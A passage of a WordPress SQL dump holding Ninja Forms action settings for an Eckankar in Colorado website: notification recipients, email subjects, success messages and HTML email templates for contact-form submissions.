11:45:44','created_at','2018-01-03 11:45:44'),(3979,135,'date_updated','2016-01-15','date_updated','2016-01-15'),(3980,135,'from_name','','from_name',''),(3981,135,'from_address','','from_address',''),(3982,135,'to','{wp:admin_email}','to','{wp:admin_email}'),(3983,135,'email_subject','Ninja Forms Submission','email_subject','Ninja Forms Submission'),(3984,135,'email_message','{fields_table}','email_message','{fields_table}'),(3985,135,'attach_csv','0','attach_csv','0'),(3986,135,'email_format','html','email_format','html'),(3987,135,'reply_to','','reply_to',''),(3988,135,'cc','','cc',''),(3989,135,'bcc','','bcc',''),(3990,135,'redirect_url','','redirect_url',''),(3991,135,'success_msg','<div style=\"text-align: center; width: 60%;margin: auto; padding-top: 80px; padding-bottom: 80px\"><span style=\"font-size: 38pt\"><span style=\"color: #23507d\"><strong>Thank You!</strong></span></span><p> <span style=\"font-size: 18pt\">We appreciate you taking the time to communicate with us. You will be contacted soon regarding your submission.</span></p></div>','success_msg','<div style=\"text-align: center; width: 60%;margin: auto; padding-top: 80px; padding-bottom: 80px\"><span style=\"font-size: 38pt\"><span style=\"color: #23507d\"><strong>Thank You!</strong></span></span><p> <span style=\"font-size: 18pt\">We appreciate you taking the time to communicate with us. You will be contacted soon regarding your submission.</span></p></div>'),(3992,135,'label','Success Message','label','Success Message'),(3993,135,'parent_id','13','parent_id','13'),(3994,136,'email_message_plain','','email_message_plain',''),(3995,136,'tag','','tag',''),(3996,136,'payment_gateways','','payment_gateways',''),(3997,136,'payment_total','0','payment_total','0'),(3998,136,'objectType','Action','objectType','Action'),(3999,136,'objectDomain','actions','objectDomain','actions'),(4000,136,'editActive','','editActive',''),(4001,136,'message','This action adds users to WordPress\' personal data delete tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.','message','This action adds users to WordPress\' personal data delete tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.'),(4002,136,'title','','title',''),(4003,136,'key','','key',''),(4004,136,'type','email','type','email'),(4005,136,'active','1','active','1'),(4006,136,'created_at','2018-01-03 11:45:44','created_at','2018-01-03 11:45:44'),(4007,136,'date_updated','2016-01-19','date_updated','2016-01-19'),(4008,136,'from_name','Eckankar In Colorado Contact Form','from_name','Eckankar In Colorado Contact Form'),(4009,136,'from_address','contact@eckankar-colorado.org','from_address','contact@eckankar-colorado.org'),(4010,136,'to','webmaster@eckankar-colorado.org','to','webmaster@eckankar-colorado.org'),(4011,136,'email_subject','ECK Colorado Website - Form Record Received','email_subject','ECK Colorado Website - Form Record Received'),(4012,136,'attach_csv','0','attach_csv','0'),(4013,136,'email_format','html','email_format','html'),(4014,136,'reply_to','','reply_to',''),(4015,136,'cc','','cc',''),(4016,136,'bcc','','bcc',''),(4017,136,'redirect_url','','redirect_url',''),(4018,136,'success_msg','','success_msg',''),(4019,136,'label','Admin Email','label','Admin Email'),(4020,136,'parent_id','13','parent_id','13'),(4021,136,'email_message','<table id=\"bodyTable\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\">\n<tbody>\n<tr>\n<td valign=\"top\" align=\"center\"><table id=\"emailContainer\" width=\"800\" cellspacing=\"0\" cellpadding=\"10\" border=\"0\">\n<tbody>\n<tr>\n<td valign=\"top\" align=\"left\"><table id=\"emailHeader\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\">\n<tbody>\n<tr>\n<td style=\"background-color: #ebebeb;padding-left: 10px;color: #23507d;line-height: 80%\" valign=\"top\" align=\"left<br ></td>\n<br />                                \"><h1> Eckankar In Colorado</h1>\n<br></td>\n<td>&nbsp;</td>\n</tr>\n</tbody>\n</table>\n</td>\n</tr>\n<tr>\n<td valign=\"top\" align=\"center\"><table id=\"emailBody\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\" border=\"0\">\n<tbody>\n<tr>\n  <td valign=\"top\" align=\"left\"><p><strong><span style=\"font-size: 20px;\">Hello! You have a new \"Youth and Family\" contact form submission.</span><br><br></strong>This form was generated from a user submission on the <em>Eckankar In Colorado</em> website. You are receiving this submission because you are listed as the contact to receive these messages.</p>\n<p>The following person has requested contact. Here is the information that <strong><span style=\"color: #23507D; font-weight:strong;\">{field:textbox_268}</span></strong> has submitted:</p>\n</td>\n</tr>\n</tbody>\n</table>\n<br><table id=\"emailHeader\" width=\"100%\" cellspacing=\"0\" cellpadding=\"20\" border=\"0\">\n<tbody>\n<tr>\n<td style=\"background-color: #ebebeb;padding: 10px;border: 1px solid #cccccc\" valign=\"top\" align=\"left<br ></td>\n<br />                                \"><p><span style=\"color: #333333\"><strong>FIRST NAME:</strong>&nbsp; {field:textbox_268}<br></span><span style=\"color: #333333\"><strong>LAST NAME:</strong>&nbsp; {field:lastname_269}</span><span style=\"color: #333333\"><br></span><span style=\"color: #333333\"><strong>EMAIL:</strong>&nbsp; {field:email_270}<br></span><span style=\"color: #333333\"><strong>MESSAGE SUBJECT:</strong>&nbsp; {field:textbox_303}</span><br><span style=\"color: #333333\"><strong>ENTER YOUR MESSAGE: </strong>{field:textarea_276}</span></p>\n</td>\n</tr>\n</tbody>\n</table>\n</td>\n</tr>\n<tr>\n<td valign=\"top\" align=\"center\"><table id=\"emailFooter\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\" border=\"0\">\n<tbody>\n<tr>\n<td valign=\"top\" align=\"left\">If you have any questions regarding the origin of this form, please feel free to contact the Eckankar In Colorado webmaster: webmaster@eckankar-colorado.org<br><br><p style=\"color: #23507d\"><em>Your Eckankar in Colorado Team<br> <a href=\"https://www.eckankar-colorado.org\">https://www.eckankar-colorado.org</a></em></p>\n<br><br></td>\n</tr>\n</tbody>\n</table>\n</td>\n</tr>\n</tbody>\n</table>\n</td>\n</tr>\n</tbody>\n</table>\n<br>','email_message','<table id=\"bodyTable\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\">\n<tbody>\n<tr>\n<td valign=\"top\" align=\"center\"><table id=\"emailContainer\" width=\"800\" cellspacing=\"0\" cellpadding=\"10\" border=\"0\">\n<tbody>\n<tr>\n<td valign=\"top\" align=\"left\"><table id=\"emailHeader\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\">\n<tbody>\n<tr>\n<td style=\"background-color: #ebebeb;padding-left: 10px;color: #23507d;line-height: 80%\" valign=\"top\" align=\"left<br ></td>\n<br />                                \"><h1> Eckankar In Colorado</h1>\n<br></td>\n<td>&nbsp;</td>\n</tr>\n</tbody>\n</table>\n</td>\n</tr>\n<tr>\n<td valign=\"top\" align=\"center\"><table id=\"emailBody\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\" border=\"0\">\n<tbody>\n<tr>\n  <td valign=\"top\" align=\"left\"><p><strong><span style=\"font-size: 20px;\">Hello! You have a new \"Youth and Family\" contact form submission.</span><br><br></strong>This form was generated from a user submission on the <em>Eckankar In Colorado</em> website. You are receiving this submission because you are listed as the contact to receive these messages.</p>\n<p>The following person has requested contact. Here is the information that <strong><span style=\"color: #23507D; font-weight:strong;\">{field:textbox_268}</span></strong> has submitted:</p>\n</td>\n</tr>\n</tbody>\n</table>\n<br><table id=\"emailHeader\" width=\"100%\" cellspacing=\"0\" cellpadding=\"20\" border=\"0\">\n<tbody>\n<tr>\n<td style=\"background-color: #ebebeb;padding: 10px;border: 1px solid #cccccc\" valign=\"top\" align=\"left<br ></td>\n<br />                                \"><p><span style=\"color: #333333\"><strong>FIRST NAME:</strong>&nbsp; {field:textbox_268}<br></span><span style=\"color: #333333\"><strong>LAST NAME:</strong>&nbsp; {field:lastname_269}</span><span style=\"color: #333333\"><br></span><span style=\"color: #333333\"><strong>EMAIL:</strong>&nbsp; {field:email_270}<br></span><span style=\"color: #333333\"><strong>MESSAGE SUBJECT:</strong>&nbsp; {field:textbox_303}</span><br><span style=\"color: #333333\"><strong>ENTER YOUR MESSAGE: </strong>{field:textarea_276}</span></p>\n</td>\n</tr>\n</tbody>\n</table>\n</td>\n</tr>\n<tr>\n<td valign=\"top\" align=\"center\"><table id=\"emailFooter\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\" border=\"0\">\n<tbody>\n<tr>\n<td valign=\"top\" align=\"left\">If you have any questions regarding the origin of this form, please feel free to contact the Eckankar In Colorado webmaster: webmaster@eckankar-colorado.org<br><br><p style=\"color: #23507d\"><em>Your Eckankar in Colorado Team<br> <a href=\"https://www.eckankar-colorado.org\">https://www.eckankar-colorado.org</a></em></p>\n<br><br></td>\n</tr>\n</tbody>\n</table>\n</td>\n</tr>\n</tbody>\n</table>\n</td>\n</tr>\n</tbody>\n</table>\n<br>'),(4022,136,'drawerDisabled','','drawerDisabled',''),(4023,51,'drawerDisabled','','drawerDisabled',''),(4024,135,'drawerDisabled','','drawerDisabled',''),(4025,137,'title','','title',''),(4026,137,'key','','key',''),(4027,137,'type','save','type','save'),(4028,137,'active','1','active','1'),(4029,137,'created_at','2018-01-03 11:45:44','created_at','2018-01-03 11:45:44'),(4030,137,'label','Save Form','label','Save Form'),(4031,137,'objectType','Action','objectType','Action'),(4032,137,'objectDomain','actions','objectDomain','actions'),(4033,137,'editActive','','editActive',''),(4034,137,'message','This action adds users to WordPress\' personal data export tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.','message','This action adds users to WordPress\' personal data export tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.'),(4035,137,'payment_gateways','','payment_gateways',''),(4036,137,'payment_total','0','payment_total','0'),(4037,137,'tag','','tag',''),(4038,137,'to','{wp:admin_email}','to','{wp:admin_email}'),(4039,137,'reply_to','','reply_to',''),(4040,137,'email_subject','Ninja Forms Submission','email_subject','Ninja Forms Submission'),(4041,137,'email_message','{fields_table}','email_message','{fields_table}'),(4042,137,'email_message_plain','','email_message_plain',''),(4043,137,'from_name','','from_name',''),(4044,137,'from_address','','from_address',''),(4045,137,'email_format','html','email_format','html'),(4046,137,'cc','','cc',''),(4047,137,'bcc','','bcc',''),(4048,137,'redirect_url','','redirect_url',''),(4049,137,'submitter_email','','submitter_email',''),(4050,137,'fields-save-toggle','save_all','fields-save-toggle','save_all'),(4051,137,'exception_fields','a:0:{}','exception_fields','a:0:{}'),(4052,137,'set_subs_to_expire','0','set_subs_to_expire','0'),(4053,137,'subs_expire_time','90','subs_expire_time','90'),(4054,137,'parent_id','35','parent_id','35'),(4055,137,'drawerDisabled','','drawerDisabled',''),(4056,138,'title','','title',''),(4057,138,'key','','key',''),(4058,138,'type','email','type','email'),(4059,138,'active','0','active','0'),(4060,138,'created_at','2018-01-03 11:45:44','created_at','2018-01-03 11:45:44'),(4061,138,'label','Send copy to user','label','Send copy to user'),(4062,138,'objectType','Action','objectType','Action'),(4063,138,'objectDomain','actions','objectDomain','actions'),(4064,138,'editActive','','editActive',''),(4065,138,'message','This action adds users to WordPress\' personal data delete tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.','message','This action adds users to WordPress\' personal data delete tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.'),(4066,138,'payment_gateways','','payment_gateways',''),(4067,138,'payment_total','0','payment_total','0'),(4068,138,'tag','','tag',''),(4069,138,'email_message_plain','','email_message_plain',''),(4070,138,'date_updated','2016-01-15','date_updated','2016-01-15'),(4071,138,'from_name','Eckankar In Colorado','from_name','Eckankar In Colorado'),(4072,138,'from_address','webmaster@eckankar-colorado.org','from_address','webmaster@eckankar-colorado.org'),(4073,138,'to','{field:email_270}','to','{field:email_270}'),(4074,138,'email_subject','Eckankar Colorado Springs - Communication','email_subject','Eckankar Colorado Springs - Communication'),(4075,138,'email_message','<p></p><p> </p><h2 style=\"color:#23507d;\"><span style=\"font-weight: normal;\"><b>ECKANKAR IN COLORADO SPRINGS</b> </span></h2><h4>You have created a new form submission on the Eckankar In Colorado website. We will be getting in touch soon!<br></h4><p>Here is a copy of the information you have submitted:</p>  <hr>    <p> First Name:&nbsp; {field:textbox_268}</p><p>Last Name:&nbsp; {field:lastname_269}</p><p>Email:&nbsp; {field:email_270}</p><p>Phone:&nbsp; {field:phone_1599585699152}</p><p>Message Subject:&nbsp; {field:textbox_303}</p><p>Message:&nbsp; {field:please_enter_your_message_here_1599585729237}<br></p>  <hr>    <p>If you have any questions regarding the origin of this form, please feel free to contact the Eckankar In Utah webmaster: webmaster@eckankar-utah.org</p><p class=\"\"><em>The Eckankar in Utah Team</em><br>https://www.eckankar-utah.org</p>','email_message','<p></p><p> </p><h2 style=\"color:#23507d;\"><span style=\"font-weight: normal;\"><b>ECKANKAR IN COLORADO SPRINGS</b> </span></h2><h4>You have created a new form submission on the Eckankar In Colorado website. We will be getting in touch soon!<br></h4><p>Here is a copy of the information you have submitted:</p>  <hr>    <p> First Name:&nbsp; {field:textbox_268}</p><p>Last Name:&nbsp; {field:lastname_269}</p><p>Email:&nbsp; {field:email_270}</p><p>Phone:&nbsp; {field:phone_1599585699152}</p><p>Message Subject:&nbsp; {field:textbox_303}</p><p>Message:&nbsp; {field:please_enter_your_message_here_1599585729237}<br></p>  <hr>    <p>If you have any questions regarding the origin of this form, please feel free to contact the Eckankar In Utah webmaster: webmaster@eckankar-utah.org</p><p class=\"\"><em>The Eckankar in Utah Team</em><br>https://www.eckankar-utah.org</p>'),(4076,138,'attach_csv','0','attach_csv','0'),(4077,138,'email_format','html','email_format','html'),(4078,138,'reply_to','','reply_to',''),(4079,138,'cc','','cc',''),(4080,138,'bcc','','bcc',''),(4081,138,'redirect_url','','redirect_url',''),(4082,138,'success_msg','','success_msg',''),(4083,138,'parent_id','35','parent_id','35'),(4084,139,'title','','title',''),(4085,139,'key','','key',''),(4086,139,'type','successmessage','type','successmessage'),(4087,139,'active','1','active','1'),(4088,139,'created_at','2018-01-03 11:45:44','created_at','2018-01-03 11:45:44'),(4089,139,'label','Success Message','label','Success Message'),(4090,139,'objectType','Action','objectType','Action'),(4091,139,'objectDomain','actions','objectDomain','actions'),(4092,139,'editActive','','editActive',''),(4093,139,'message','This action adds users to WordPress\' personal data export tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.','message','This action adds users to WordPress\' personal data export tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.'),(4094,139,'payment_gateways','','payment_gateways',''),(4095,139,'payment_total','0','payment_total','0'),(4096,139,'tag','','tag',''),(4097,139,'email_message_plain','','email_message_plain',''),(4098,139,'submitter_email','','submitter_email',''),(4099,139,'fields-save-toggle','save_all','fields-save-toggle','save_all'),(4100,139,'exception_fields','a:0:{}','exception_fields','a:0:{}'),(4101,139,'set_subs_to_expire','0','set_subs_to_expire','0'),(4102,139,'subs_expire_time','90','subs_expire_time','90'),(4103,139,'date_updated','2016-01-15','date_updated','2016-01-15'),(4104,139,'from_name','','from_name',''),(4105,139,'from_address','','from_address',''),(4106,139,'to','{wp:admin_email}','to','{wp:admin_email}'),(4107,139,'email_subject','Ninja Forms Submission','email_subject','Ninja Forms Submission'),(4108,139,'email_message','{fields_table}','email_message','{fields_table}'),(4109,139,'attach_csv','0','attach_csv','0'),(4110,139,'email_format','html','email_format','html'),(4111,139,'reply_to','','reply_to',''),(4112,139,'cc','','cc',''),(4113,139,'bcc','','bcc',''),(4114,139,'redirect_url','','redirect_url',''),(4115,139,'success_msg','<div style=\"text-align: center; width: 60%;margin: auto; padding-top: 80px; padding-bottom: 80px\"><span style=\"font-size: 38pt\"><span style=\"color: #23507d\"><strong>Thank You!</strong></span></span><p> <span style=\"font-size: 18pt\">We appreciate you taking the time to communicate with us. You will be contacted soon regarding your submission.</span></p></div>','success_msg','<div style=\"text-align: center; width: 60%;margin: auto; padding-top: 80px; padding-bottom: 80px\"><span style=\"font-size: 38pt\"><span style=\"color: #23507d\"><strong>Thank You!</strong></span></span><p> <span style=\"font-size: 18pt\">We appreciate you taking the time to communicate with us. You will be contacted soon regarding your submission.</span></p></div>'),(4116,139,'parent_id','35','parent_id','35'),(4117,139,'drawerDisabled','','drawerDisabled',''),(4118,140,'title','','title',''),(4119,140,'key','','key',''),(4120,140,'type','email','type','email'),(4121,140,'active','1','active','1'),(4122,140,'created_at','2018-01-03 11:45:44','created_at','2018-01-03 11:45:44'),(4123,140,'label','Admin Email','label','Admin Email'),(4124,140,'email_message_plain','','email_message_plain',''),(4125,140,'tag','','tag',''),(4126,140,'payment_gateways','','payment_gateways',''),(4127,140,'payment_total','0','payment_total','0'),(4128,140,'objectType','Action','objectType','Action'),(4129,140,'objectDomain','actions','objectDomain','actions'),(4130,140,'editActive','','editActive',''),(4131,140,'message','This action adds users to WordPress\' personal data delete tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.','message','This action adds users to WordPress\' personal data delete tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.'),(4132,140,'date_updated','2016-01-19','date_updated','2016-01-19'),(4133,140,'from_name','Eckankar In Colorado Contact Form','from_name','Eckankar In Colorado Contact Form'),(4134,140,'from_address','contact@eckankar-colorado.org','from_address','contact@eckankar-colorado.org'),(4135,140,'to','webmaster@eckankar-colorado.org','to','webmaster@eckankar-colorado.org'),(4136,140,'email_subject','Colorado Springs Area - Form Record Received','email_subject','Colorado Springs Area - Form Record Received'),(4137,140,'email_message','<div class=\"boldgrid-section\"><div class=\"container\"><div class=\"row\"><div class=\"col-md-12 col-xs-12 col-sm-12\"><h1 style=\"color: #23507d;\"><u>ECKANKAR IN COLORADO SPRINGS</u></h1><h3>You Have A New Web Contact Form Submission. <br>This form was generated by a user on the Eckankar In Colorado website.</h3><h3>Here is a copy of the information submitted by {field:textbox_268}</h3></div></div></div></div><div class=\"row bg-editor-hr-wrap\"><div class=\"col-md-12 col-xs-12 col-sm-12\"><hr></div></div><div class=\"boldgrid-section\"><div class=\"container\"><div class=\"row\" style=\"background-color: #eeeeee;\"><div class=\"col-md-12 col-xs-12 col-sm-12\"><p>&nbsp;</p><p class=\"\" style=\"font-size: 17px;\"><b>First Name:</b>&nbsp; {field:textbox_268}</p><p class=\"\" style=\"font-size: 17px;\"><b>Last Name:</b>&nbsp; {field:lastname_269}</p><p class=\"\" style=\"font-size: 17px;\"><b>Email:&nbsp;</b> {field:email_270}</p><p class=\"\" style=\"font-size: 17px;\"><b>Phone:</b>&nbsp; {field:phone_1599585699152}</p><p class=\"\" style=\"font-size: 17px;\"><b>Message Subject:</b>&nbsp; {field:textbox_303}</p><p class=\"\" style=\"font-size: 17px;\"><b>Message:&nbsp;</b> {field:please_enter_your_message_here_1599585729237}</p><p>&nbsp;</p></div></div></div></div><div class=\"row bg-editor-hr-wrap\"><div class=\"col-md-12 col-xs-12 col-sm-12\"><hr></div></div><div class=\"boldgrid-section\"><div class=\"container\"><div class=\"row\"><div class=\"col-md-12 col-xs-12 col-sm-12\"><p class=\"\">If you have any questions regarding the origin of this form, please feel free to contact the Eckankar In Colorado webmaster: webmaster@eckankar-colorado.org<br><br>The Eckankar in Colorado Team<br>https://www.eckankar-colorado.org</p><p>&nbsp;</p><p>&nbsp;</p></div></div></div></div>','email_message','<div class=\"boldgrid-section\"><div class=\"container\"><div class=\"row\"><div class=\"col-md-12 col-xs-12 col-sm-12\"><h1 style=\"color: #23507d;\"><u>ECKANKAR IN COLORADO SPRINGS</u></h1><h3>You Have A New Web Contact Form Submission. <br>This form was generated by a user on the Eckankar In Colorado website.</h3><h3>Here is a copy of the information submitted by {field:textbox_268}</h3></div></div></div></div><div class=\"row bg-editor-hr-wrap\"><div class=\"col-md-12 col-xs-12 col-sm-12\"><hr></div></div><div class=\"boldgrid-section\"><div class=\"container\"><div class=\"row\" style=\"background-color: #eeeeee;\"><div class=\"col-md-12 col-xs-12 col-sm-12\"><p>&nbsp;</p><p class=\"\" style=\"font-size: 17px;\"><b>First Name:</b>&nbsp; {field:textbox_268}</p><p class=\"\" style=\"font-size: 17px;\"><b>Last Name:</b>&nbsp; {field:lastname_269}</p><p class=\"\" style=\"font-size: 17px;\"><b>Email:&nbsp;</b> {field:email_270}</p><p class=\"\" style=\"font-size: 17px;\"><b>Phone:</b>&nbsp; {field:phone_1599585699152}</p><p class=\"\" style=\"font-size: 17px;\"><b>Message Subject:</b>&nbsp; {field:textbox_303}</p><p class=\"\" style=\"font-size: 17px;\"><b>Message:&nbsp;</b> {field:please_enter_your_message_here_1599585729237}</p><p>&nbsp;</p></div></div></div></div><div class=\"row bg-editor-hr-wrap\"><div class=\"col-md-12 col-xs-12 col-sm-12\"><hr></div></div><div class=\"boldgrid-section\"><div class=\"container\"><div class=\"row\"><div class=\"col-md-12 col-xs-12 col-sm-12\"><p class=\"\">If you have any questions regarding the origin of this form, please feel free to contact the Eckankar In Colorado webmaster: webmaster@eckankar-colorado.org<br><br>The Eckankar in Colorado Team<br>https://www.eckankar-colorado.org</p><p>&nbsp;</p><p>&nbsp;</p></div></div></div></div>'),(4138,140,'drawerDisabled','','drawerDisabled',''),(4139,140,'attach_csv','0','attach_csv','0'),(4140,140,'email_format','html','email_format','html'),(4141,140,'reply_to','','reply_to',''),(4142,140,'cc','','cc',''),(4143,140,'bcc','','bcc',''),(4144,140,'redirect_url','','redirect_url',''),(4145,140,'success_msg','','success_msg',''),(4146,140,'parent_id','35','parent_id','35'),(4273,138,'drawerDisabled','','drawerDisabled',''),(4396,77,'success_msg','Your form has been successfully submitted.','success_msg','Your form has been successfully submitted.'),(4397,133,'success_msg','Your form has been successfully submitted.','success_msg','Your form has been successfully submitted.'),(4399,21,'success_msg','Your form has been successfully submitted.','success_msg','Your form has been successfully submitted.'),(4400,5,'success_msg','Your form has been successfully submitted.','success_msg','Your form has been successfully submitted.'),(4401,17,'success_msg','Your form has been successfully submitted.','success_msg','Your form has been successfully submitted.'),(4402,49,'success_msg','Your form has been successfully submitted.','success_msg','Your form has been successfully submitted.'),(4403,149,'objectType','Action','objectType','Action'),(4404,149,'objectDomain','actions','objectDomain','actions'),(4405,149,'editActive','','editActive',''),(4406,149,'message','This action adds users to WordPress\' personal data export tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.','message','This action adds users to WordPress\' personal data export tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.'),(4407,149,'payment_gateways','','payment_gateways',''),(4408,149,'payment_total','0','payment_total','0'),(4409,149,'tag','','tag',''),(4410,149,'to','{wp:admin_email}','to','{wp:admin_email}'),(4411,149,'reply_to','','reply_to',''),(4412,149,'email_subject','Ninja Forms Submission','email_subject','Ninja Forms Submission'),(4413,149,'email_message','{fields_table}','email_message','{fields_table}'),(4414,149,'email_message_plain','','email_message_plain',''),(4415,149,'from_name','','from_name',''),(4416,149,'from_address','','from_address',''),(4417,149,'email_format','html','email_format','html'),(4418,149,'cc','','cc',''),(4419,149,'bcc','','bcc',''),(4420,149,'redirect_url','','redirect_url',''),(4421,149,'submitter_email','','submitter_email',''),(4422,149,'fields-save-toggle','save_all','fields-save-toggle','save_all'),(4423,149,'exception_fields','a:0:{}','exception_fields','a:0:{}'),(4424,149,'set_subs_to_expire','0','set_subs_to_expire','0'),(4425,149,'subs_expire_time','90','subs_expire_time','90'),(4426,149,'title','','title',''),(4427,149,'key','','key',''),(4428,149,'type','save','type','save'),(4429,149,'active','1','active','1'),(4430,149,'created_at','2018-01-03 11:45:44','created_at','2018-01-03 11:45:44'),(4431,149,'label','Save Form','label','Save Form'),(4432,149,'parent_id','13','parent_id','13'),(4433,149,'success_msg','Your form has been successfully submitted.','success_msg','Your form has been successfully submitted.'),(4434,150,'objectType','Action','objectType','Action'),(4435,150,'objectDomain','actions','objectDomain','actions'),(4436,150,'editActive','','editActive',''),(4437,150,'message','This action adds users to WordPress\' personal data delete tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.','message','This action adds users to WordPress\' personal data delete tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.'),(4438,150,'payment_gateways','','payment_gateways',''),(4439,150,'payment_total','0','payment_total','0'),(4440,150,'tag','','tag',''),(4441,150,'email_message_plain','','email_message_plain',''),(4442,150,'title','','title',''),(4443,150,'key','','key',''),(4444,150,'type','email','type','email'),(4445,150,'active','0','active','0'),(4446,150,'created_at','2018-01-03 11:45:44','created_at','2018-01-03 11:45:44'),(4447,150,'date_updated','2016-01-15','date_updated','2016-01-15'),(4448,150,'from_name','Eckankar In Colorado','from_name','Eckankar In Colorado'),(4449,150,'from_address','webmaster@eckankar-colorado.org','from_address','webmaster@eckankar-colorado.org'),(4450,150,'to','{field:email_270}','to','{field:email_270}'),(4451,150,'email_subject','Western Slope Leadership Communication','email_subject','Western Slope Leadership Communication'),(4452,150,'email_message','<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"100%\" id=\"bodyTable\"><br /><br />\r\n    <tr><br /><br />\r\n        <td align=\"center\" valign=\"top\"><br /><br />\r\n            <table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"800\" id=\"emailContainer\"><br /><br />\r\n                <tr><br /><br />\r\n                    <td align=\"left\" valign=\"top\"><br /><br />\r\n                        <table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"100%\" id=\"emailHeader\"><br /><br />\r\n                            <tr><br /><br />\r\n                                <td align=\"left<br /><br />\r\n                                \" valign=\"top\" style=\"background-color:#ebebeb;padding-left:10px;color:#23507d;line-height: 80%\"><br /><br />\r\n                                    <h1>Eckankar In Colorado</h1> <br /><br />\r\n                                </td><br /><br />\r\n                                <br /><br />\r\n                                <br /><br />\r\n                                <td></td><br /><br />\r\n                                <br /><br />\r\n                                <br /><br />\r\n                            </tr><br /><br />\r\n                        </table><br /><br />\r\n                    </td><br /><br />\r\n                </tr><br /><br />\r\n                <tr><br /><br />\r\n                    <td align=\"center\" valign=\"top\"><br /><br />\r\n                        <table border=\"0\" cellpadding=\"8\" cellspacing=\"0\" width=\"100%\" id=\"emailBody\"><br /><br />\r\n                            <tr><br /><br />\r\n                                <td align=\"left\" valign=\"top\"><br /><br />\r\n                                   <p><strong>Hello {field:textbox_268},</strong><br /><br />\r\n                                  </p><br /><br />\r\n                                  <p>You have created a new form submission on the Eckankar In Colorado website.                                      Your submission is requesting contact with a person on the \"Western Slope Leadership Communication\" team.</p><br /><br />\r\n                              <p>Here is a copy of the information that you have submitted: </p></td><br /><br />\r\n                            </tr><br /><br />\r\n                        </table><br /><br />\r\n                        <br /><br />\r\n                        <br /><br />\r\n                        <br /><br />\r\n                          <table border=\"0\" cellpadding=\"8\" cellspacing=\"0\" width=\"100%\" id=\"emailHeader\"><br /><br />\r\n                            <tr><br /><br />\r\n                                <td align=\"left<br /><br />\r\n                                \" valign=\"top\" style=\"background-color:#ebebeb;padding:10px;border: 1px solid #cccccc\"><br /><br />\r\n                                    <p><span style=\"color: #333333\"><strong>FIRST NAME:</strong> {field:textbox_268}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>LAST NAME:</strong> {field:lastname_269}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>EMAIL:</strong> {field:email_270}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>TELEPHONE:</strong> [ninja_forms_field id=271]</span><br /><br /><br />\r\n <span style=\"color: #333333\"><strong>LOCAL AREA:</strong> [ninja_forms_field id=272]<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>PERSON YOU WOULD LIKE TO CONTACT:</strong> [ninja_forms_field id=275]</span></p><br /><br />\r\n<p><span style=\"color: #333333\"><strong>ENTER YOUR MESSAGE: </strong>{field:textarea_276}</span></p><br /><br />\r\n                                </td><br /><br />\r\n                            </tr><br /><br />\r\n                        </table><br /><br />\r\n                        <br /><br />\r\n                        <br /><br />\r\n                    </td><br /><br />\r\n                </tr><br /><br />\r\n                <tr><br /><br />\r\n                    <td align=\"center\" valign=\"top\"><br /><br />\r\n                        <table border=\"0\" cellpadding=\"8\" cellspacing=\"0\" width=\"100%\" id=\"emailFooter\"><br /><br />\r\n                            <tr><br /><br />\r\n                                <td align=\"left\" valign=\"top\">If you have any questions regarding the origin of this form, please feel free to contact the<br /><br /><br />\r\n                                  Eckankar In Colorado webmaster: webmaster@eckankar-colorado.org<br /><br />\r\n<br /><br />\r\n<p style=\"color:#23507d\"><em>Your Eckankar in Colorado Team<br /><br /><br />\r\n  <a href=\"https://www.eckankar-colorado.org\">https://www.eckankar-colorado.org</a></em><br /><br />\r\n                                </p></td><br /><br />\r\n                            </tr><br /><br />\r\n                            <br /><br />\r\n                            <br /><br />\r\n                        </table><br /><br />\r\n                    </td><br /><br />\r\n                </tr><br /><br />\r\n            </table><br /><br />\r\n        </td><br /><br />\r\n    </tr><br /><br />\r\n</table><br /><br />\r\n','email_message','<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"100%\" id=\"bodyTable\"><br /><br />\r\n    <tr><br /><br />\r\n        <td align=\"center\" valign=\"top\"><br /><br />\r\n            <table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"800\" id=\"emailContainer\"><br /><br />\r\n                <tr><br /><br />\r\n                    <td align=\"left\" valign=\"top\"><br /><br />\r\n                        <table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"100%\" id=\"emailHeader\"><br /><br />\r\n                            <tr><br /><br />\r\n                                <td align=\"left<br /><br />\r\n                                \" valign=\"top\" style=\"background-color:#ebebeb;padding-left:10px;color:#23507d;line-height: 80%\"><br /><br />\r\n                                    <h1>Eckankar In Colorado</h1> <br /><br />\r\n                                </td><br /><br />\r\n                                <br /><br />\r\n                                <br /><br />\r\n                                <td></td><br /><br />\r\n                                <br /><br />\r\n                                <br /><br />\r\n                            </tr><br /><br />\r\n                        </table><br /><br />\r\n                    </td><br /><br />\r\n                </tr><br /><br />\r\n                <tr><br /><br />\r\n                    <td align=\"center\" valign=\"top\"><br /><br />\r\n                        <table border=\"0\" cellpadding=\"8\" cellspacing=\"0\" width=\"100%\" 